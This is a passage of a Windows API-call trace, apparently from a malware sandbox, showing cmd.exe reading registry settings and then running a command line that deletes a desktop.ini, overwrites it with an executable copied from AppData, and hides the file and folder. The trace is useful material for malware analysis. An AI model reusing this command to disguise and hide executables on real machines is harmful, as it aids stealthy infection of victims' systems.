lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x0, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x9, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegCloseKey (hKey=0x40) returned 0x0 [0132.657] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0132.657] srand (_Seed=0x5b886367) [0132.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" [0132.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" [0132.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c1be0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.658] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.658] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.658] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.658] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.658] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.658] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.658] GetEnvironmentStringsW () returned 0x1c25d0* [0132.658] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.658] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.658] 
GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.658] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.658] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.658] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.658] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.659] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.659] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f6e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f6e8, lpFilePart=0x12f6e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f6e4*="Desktop") returned 0x18 [0132.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f464 | out: lpFindFileData=0x12f464) returned 0x1c0c60 [0132.659] FindClose (in: hFindFile=0x1c0c60 | out: hFindFile=0x1c0c60) returned 1 [0132.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.659] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.659] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.659] GetEnvironmentStringsW () returned 0x1c0480* [0132.660] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.660] GetConsoleOutputCP () returned 0x1b5 [0132.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.660] GetUserDefaultLCID () returned 0x409 [0132.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f828, cchData=128 | out: lpLCData="0") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f828, cchData=128 | out: lpLCData="0") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f828, cchData=128 | out: lpLCData="1") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.661] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.661] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.662] GetConsoleTitleW (in: lpConsoleTitle=0x1b0ab8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.662] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.663] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0132.663] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0132.663] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0132.663] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0132.663] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0132.663] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0132.663] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0132.665] _wcsicmp (_String1="del", _String2=")") returned 59 [0132.665] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0132.665] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0132.665] _wcsicmp (_String1="IF", _String2="del") returned 5 [0132.665] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0132.665] _wcsicmp (_String1="REM", _String2="del") returned 14 [0132.665] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0132.666] _wcsicmp (_String1="type", _String2=")") returned 75 [0132.666] 
_wcsicmp (_String1="FOR", _String2="type") returned -14 [0132.666] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0132.666] _wcsicmp (_String1="IF", _String2="type") returned -11 [0132.667] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0132.667] _wcsicmp (_String1="REM", _String2="type") returned -2 [0132.667] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0132.672] SetErrorMode (uMode=0x0) returned 0x0 [0132.672] SetErrorMode (uMode=0x1) returned 0x0 [0132.672] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c0488, lpFilePart=0x12efdc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12efdc*="Desktop") returned 0x18 [0132.672] SetErrorMode (uMode=0x0) returned 0x1 [0132.672] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.672] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.676] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.677] GetLastError () returned 0x2 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.677] GetLastError () returned 0x2 [0132.677] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 
0x1c2558 [0132.677] FindClose (in: hFindFile=0x1c2558 | out: hFindFile=0x1c2558) returned 1 [0132.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0xffffffff [0132.678] GetLastError () returned 0x2 [0132.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed58) returned 0x1c2558 [0132.678] FindClose (in: hFindFile=0x1c2558 | out: hFindFile=0x1c2558) returned 1 [0132.678] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.678] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.678] GetConsoleTitleW (in: lpConsoleTitle=0x12f250, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.782] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f1a0 | out: lpAttributeList=0x12f0d8, lpSize=0x12f1a0) returned 1 [0132.782] UpdateProcThreadAttribute (in: lpAttributeList=0x12f0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f198, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f0d8, lpPreviousValue=0x0) returned 1 [0132.782] GetStartupInfoW (in: lpStartupInfo=0x12f094 | out: lpStartupInfo=0x12f094*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.782] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.783] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f134*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f180 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessInformation=0x12f180*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbf8, dwThreadId=0xc08)) returned 1 [0132.791] CloseHandle (hObject=0x4c) returned 1 [0132.791] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.791] GetEnvironmentStringsW () returned 0x1c0930* [0132.791] FreeEnvironmentStringsW (penv=0x1c0930) returned 1 [0132.791] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.949] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f074 | out: lpExitCode=0x12f074*=0x0) returned 1 [0132.949] CloseHandle (hObject=0x50) returned 1 [0132.950] _vsnwprintf (in: _Buffer=0x12f1bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f080 | out: _Buffer="00000000") returned 8 [0132.950] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.950] GetEnvironmentStringsW () returned 0x1c25d0* [0132.950] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.950] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.950] GetEnvironmentStringsW () returned 0x1c25d0* [0132.950] FreeEnvironmentStringsW (penv=0x1c25d0) returned 1 [0132.950] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f0d8 | out: lpAttributeList=0x12f0d8) [0132.950] 
GetConsoleTitleW (in: lpConsoleTitle=0x12f458, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e4d0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e4d4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e4d0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0132.951] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0132.951] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.951] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini")) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x10 [0132.951] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.951] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini")) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x1c365c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c365c) returned 0xffffffff [0132.951] GetLastError () returned 0x2 [0132.951] _get_osfhandle (_FileHandle=2) returned 0xb [0132.951] GetFileType (hFile=0xb) returned 0x2 [0132.952] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0132.952] GetConsoleMode (in: hConsoleHandle=0xb, 
lpMode=0x12eed0 | out: lpMode=0x12eed0) returned 1 [0132.952] _get_osfhandle (_FileHandle=2) returned 0xb [0132.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ef04 | out: lpConsoleScreenBufferInfo=0x12ef04) returned 1 [0132.952] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.953] GetFileType (hFile=0x7) returned 0x2 [0132.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.953] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f5f4 | out: lpMode=0x12f5f4) returned 1 [0132.953] _dup (_FileHandle=1) returned 3 [0132.953] _close (_FileHandle=1) returned 0 [0132.953] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini", _String2="con") returned -53 [0132.953] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f5c4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0132.954] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0132.954] GetConsoleTitleW (in: lpConsoleTitle=0x12f3f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.954] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12ef58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ef58) returned 0x1c0778 [0132.954] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0132.954] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0132.954] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0132.954] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12de64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0132.954] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] GetFileType (hFile=0x58) returned 0x1 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12debc | out: lpFileSizeHigh=0x12debc*=0x0) returned 0x7d600 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.954] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] GetFileType (hFile=0x50) returned 0x1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] GetFileType (hFile=0x50) returned 0x1 [0132.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.955] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 
0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] GetFileType (hFile=0x50) returned 0x1 [0132.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.956] WriteFile (in: 
hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.957] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 